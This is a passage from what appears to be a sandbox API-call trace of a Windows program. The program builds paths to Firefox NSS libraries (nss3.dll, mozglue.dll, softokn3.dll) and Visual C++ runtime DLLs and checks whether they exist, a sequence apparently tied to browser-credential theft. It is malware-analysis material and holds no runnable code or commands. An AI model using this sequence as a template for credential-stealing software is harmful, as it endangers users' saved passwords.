flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0204.750] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.751] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0204.751] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.751] lstrlenW (lpString="\\") returned 1 [0204.751] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.751] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.751] lstrlenW (lpString="nss3.dll") returned 8 [0204.751] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.752] lstrlenW (lpString="nss3.dll") returned 8 [0204.752] lstrcpyW (in: lpString1=0x2e20000, lpString2="nss3.dll" | out: lpString1="nss3.dll") returned="nss3.dll" [0204.752] lstrlenW (lpString="nss3.dll") returned 8 [0204.752] lstrlenW (lpString="\\") returned 1 [0204.752] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.752] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0204.752] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.752] lstrcatW (in: lpString1="\\", lpString2="nss3.dll" | out: lpString1="\\nss3.dll") returned="\\nss3.dll" [0204.752] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.753] lstrlenW (lpString="\\") returned 1 [0204.753] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.753] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.753] lstrlenW (lpString="msvcr120.dll") returned 12 [0204.753] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.753] lstrlenW (lpString="msvcr120.dll") returned 12 [0204.753] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcr120.dll" | out: lpString1="msvcr120.dll") returned="msvcr120.dll" [0204.753] lstrlenW (lpString="msvcr120.dll") returned 12 [0204.753] lstrlenW (lpString="\\") returned 1 [0204.753] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.753] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2f40000 [0204.754] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.754] lstrcatW (in: lpString1="\\", lpString2="msvcr120.dll" | out: lpString1="\\msvcr120.dll") returned="\\msvcr120.dll" [0204.754] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.754] lstrlenW (lpString="\\") returned 1 [0204.755] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.755] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.755] lstrlenW (lpString="msvcp120.dll") returned 12 [0204.755] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.755] lstrlenW (lpString="msvcp120.dll") returned 12 [0204.755] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcp120.dll" | out: lpString1="msvcp120.dll") returned="msvcp120.dll" [0204.755] lstrlenW (lpString="msvcp120.dll") returned 12 [0204.755] lstrlenW (lpString="\\") returned 1 [0204.755] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.755] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0204.756] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.756] lstrcatW (in: lpString1="\\", lpString2="msvcp120.dll" | out: lpString1="\\msvcp120.dll") returned="\\msvcp120.dll" [0204.756] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.757] lstrlenW (lpString="\\") returned 1 [0204.757] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.757] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.757] lstrlenW (lpString="mozglue.dll") returned 11 [0204.757] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.757] lstrlenW (lpString="mozglue.dll") returned 11 [0204.758] lstrcpyW (in: lpString1=0x2e20000, lpString2="mozglue.dll" | out: lpString1="mozglue.dll") returned="mozglue.dll" [0204.758] lstrlenW (lpString="mozglue.dll") returned 11 [0204.758] lstrlenW (lpString="\\") returned 1 [0204.758] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.758] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f60000 [0204.758] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.758] lstrcatW (in: lpString1="\\", lpString2="mozglue.dll" | out: lpString1="\\mozglue.dll") returned="\\mozglue.dll" [0204.758] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.759] lstrlenW (lpString="\\") returned 1 [0204.759] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.759] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.759] lstrlenW (lpString="softokn3.dll") returned 12 [0204.759] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.759] lstrlenW (lpString="softokn3.dll") returned 12 [0204.760] lstrcpyW (in: lpString1=0x2e20000, lpString2="softokn3.dll" | out: lpString1="softokn3.dll") returned="softokn3.dll" [0204.760] lstrlenW (lpString="softokn3.dll") returned 12 [0204.760] lstrlenW (lpString="\\") returned 1 [0204.760] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.760] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0204.760] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.760] lstrcatW (in: lpString1="\\", lpString2="softokn3.dll" | out: lpString1="\\softokn3.dll") returned="\\softokn3.dll" [0204.760] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.761] lstrlenW (lpString="\\") returned 1 [0204.761] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.761] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.761] lstrlenW (lpString="msvcp") returned 5 [0204.761] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.761] lstrlenW (lpString="msvcp") returned 5 [0204.761] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcp" | out: lpString1="msvcp") returned="msvcp" [0204.761] lstrlenW (lpString="msvcp") returned 5 [0204.761] lstrlenW (lpString="\\") returned 1 [0204.761] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.761] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0204.762] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.762] lstrcatW (in: lpString1="\\", lpString2="msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.762] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.762] lstrlenW (lpString="\\") returned 1 [0204.762] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.762] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.762] lstrlenW (lpString="msvcr") returned 5 [0204.763] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.763] lstrlenW (lpString="msvcr") returned 5 [0204.763] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcr" | out: lpString1="msvcr") returned="msvcr" [0204.763] lstrlenW (lpString="msvcr") returned 5 [0204.763] lstrlenW (lpString="\\") returned 1 [0204.763] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.763] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3110000 [0204.763] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.763] lstrcatW (in: lpString1="\\", lpString2="msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.763] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.764] lstrlenW (lpString="\\msvcp") returned 6 [0204.764] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.764] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.764] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="90") returned 2 [0204.764] lstrlenW (lpString="90") returned 2 [0204.764] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.765] lstrlenW (lpString="90") returned 2 [0204.765] lstrcpyW (in: lpString1=0x2e20000, lpString2="90" | out: lpString1="90") returned="90" [0204.765] lstrlenW (lpString="90") returned 2 [0204.765] lstrlenW (lpString="\\msvcp") returned 6 [0204.765] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.765] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.765] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.766] lstrcatW (in: lpString1="\\msvcp", lpString2="90" | out: lpString1="\\msvcp90") returned="\\msvcp90" [0204.766] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.766] lstrlenW (lpString=".dll") returned 4 [0204.766] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.766] lstrlenW (lpString=".dll") returned 4 [0204.766] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.766] lstrlenW (lpString=".dll") returned 4 [0204.766] lstrlenW (lpString="\\msvcp90") returned 8 [0204.766] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.766] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.767] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.767] lstrcatW (in: lpString1="\\msvcp90", lpString2=".dll" | out: lpString1="\\msvcp90.dll") returned="\\msvcp90.dll" [0204.767] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.767] PathFileExistsW (pszPath="\\msvcp90.dll") returned 0 [0204.767] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.768] lstrlenW (lpString="\\msvcp") returned 6 [0204.768] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.768] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.768] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="100") returned 3 [0204.768] lstrlenW (lpString="100") returned 3 [0204.768] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.769] lstrlenW (lpString="100") returned 3 [0204.769] lstrcpyW (in: lpString1=0x2e20000, lpString2="100" | out: lpString1="100") returned="100" [0204.769] lstrlenW (lpString="100") returned 3 [0204.769] lstrlenW (lpString="\\msvcp") returned 6 [0204.769] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.769] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.769] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.770] lstrcatW (in: lpString1="\\msvcp", lpString2="100" | out: lpString1="\\msvcp100") returned="\\msvcp100" [0204.770] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.770] lstrlenW (lpString=".dll") returned 4 [0204.770] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.770] lstrlenW (lpString=".dll") returned 4 [0204.770] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.771] lstrlenW (lpString=".dll") returned 4 [0204.771] lstrlenW (lpString="\\msvcp100") returned 9 [0204.771] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.771] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.771] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.771] lstrcatW (in: lpString1="\\msvcp100", lpString2=".dll" | out: lpString1="\\msvcp100.dll") returned="\\msvcp100.dll" [0204.771] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.772] PathFileExistsW (pszPath="\\msvcp100.dll") returned 0 [0204.772] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.772] lstrlenW (lpString="\\msvcp") returned 6 [0204.772] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.773] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.773] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="110") returned 3 [0204.773] lstrlenW (lpString="110") returned 3 [0204.773] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.773] lstrlenW (lpString="110") returned 3 [0204.773] lstrcpyW (in: lpString1=0x2e20000, lpString2="110" | out: lpString1="110") returned="110" [0204.773] lstrlenW (lpString="110") returned 3 [0204.773] lstrlenW (lpString="\\msvcp") returned 6 [0204.773] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.773] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.774] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.774] lstrcatW (in: lpString1="\\msvcp", lpString2="110" | out: lpString1="\\msvcp110") returned="\\msvcp110" [0204.774] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.775] lstrlenW (lpString=".dll") returned 4 [0204.775] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.775] lstrlenW (lpString=".dll") returned 4 [0204.775] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.775] lstrlenW (lpString=".dll") returned 4 [0204.775] lstrlenW (lpString="\\msvcp110") returned 9 [0204.775] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.775] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.776] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.776] lstrcatW (in: lpString1="\\msvcp110", lpString2=".dll" | out: lpString1="\\msvcp110.dll") returned="\\msvcp110.dll" [0204.776] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.776] PathFileExistsW (pszPath="\\msvcp110.dll") returned 0 [0204.777] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.777] lstrlenW (lpString="\\msvcp") returned 6 [0204.777] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.777] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.777] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="120") returned 3 [0204.777] lstrlenW (lpString="120") returned 3 [0204.777] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.778] lstrlenW (lpString="120") returned 3 [0204.778] lstrcpyW (in: lpString1=0x2e20000, lpString2="120" | out: lpString1="120") returned="120" [0204.778] lstrlenW (lpString="120") returned 3 [0204.778] lstrlenW (lpString="\\msvcp") returned 6 [0204.778] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.778] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.778] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.779] lstrcatW (in: lpString1="\\msvcp", lpString2="120" | out: lpString1="\\msvcp120") returned="\\msvcp120" [0204.779] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.779] lstrlenW (lpString=".dll") returned 4 [0204.779] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.779] lstrlenW (lpString=".dll") returned 4 [0204.780] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.780] lstrlenW (lpString=".dll") returned 4 [0204.780] lstrlenW (lpString="\\msvcp120") returned 9 [0204.780] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.780] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.780] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.780] lstrcatW (in: lpString1="\\msvcp120", lpString2=".dll" | out: lpString1="\\msvcp120.dll") returned="\\msvcp120.dll" [0204.780] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.781] PathFileExistsW (pszPath="\\msvcp120.dll") returned 0 [0204.781] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.781] lstrlenW (lpString="\\msvcp") returned 6 [0204.781] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.782] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.782] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="130") returned 3 [0204.782] lstrlenW (lpString="130") returned 3 [0204.782] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.783] lstrlenW (lpString="130") returned 3 [0204.783] lstrcpyW (in: lpString1=0x2e20000, lpString2="130" | out: lpString1="130") returned="130" [0204.783] lstrlenW (lpString="130") returned 3 [0204.783] lstrlenW (lpString="\\msvcp") returned 6 [0204.783] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.783] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.783] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.783] lstrcatW (in: lpString1="\\msvcp", lpString2="130" | out: lpString1="\\msvcp130") returned="\\msvcp130" [0204.783] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.784] lstrlenW (lpString=".dll") returned 4 [0204.784] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.784] lstrlenW (lpString=".dll") returned 4 [0204.784] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.784] lstrlenW (lpString=".dll") returned 4 [0204.784] lstrlenW (lpString="\\msvcp130") returned 9 [0204.784] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.784] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.785] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.785] lstrcatW (in: lpString1="\\msvcp130", lpString2=".dll" | out: lpString1="\\msvcp130.dll") returned="\\msvcp130.dll" [0204.785] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.785] PathFileExistsW (pszPath="\\msvcp130.dll") returned 0 [0204.786] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.786] lstrlenW (lpString="\\msvcp") returned 6 [0204.786] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.786] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.786] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="140") returned 3 [0204.786] lstrlenW (lpString="140") returned 3 [0204.786] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.787] lstrlenW (lpString="140") returned 3 [0204.787] lstrcpyW (in: lpString1=0x2e20000, lpString2="140" | out: lpString1="140") returned="140" [0204.787] lstrlenW (lpString="140") returned 3 [0204.787] lstrlenW (lpString="\\msvcp") returned 6 [0204.787] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.787] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.787] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.788] lstrcatW (in: lpString1="\\msvcp", lpString2="140" | out: lpString1="\\msvcp140") returned="\\msvcp140" [0204.788] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.788] lstrlenW (lpString=".dll") returned 4 [0204.788] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.789] lstrlenW (lpString=".dll") returned 4 [0204.789] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.789] lstrlenW (lpString=".dll") returned 4 [0204.789] lstrlenW (lpString="\\msvcp140") returned 9 [0204.789] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.789] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.789] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.789] lstrcatW (in: lpString1="\\msvcp140", lpString2=".dll" | out: lpString1="\\msvcp140.dll") returned="\\msvcp140.dll" [0204.789] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.790] PathFileExistsW (pszPath="\\msvcp140.dll") returned 0 [0204.790] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.790] lstrlenW (lpString="\\msvcr") returned 6 [0204.790] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.791] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.791] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="90") returned 2 [0204.791] lstrlenW (lpString="90") returned 2 [0204.791] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.791] lstrlenW (lpString="90") returned 2 [0204.791] lstrcpyW (in: lpString1=0x2e20000, lpString2="90" | out: lpString1="90") returned="90" [0204.791] lstrlenW (lpString="90") 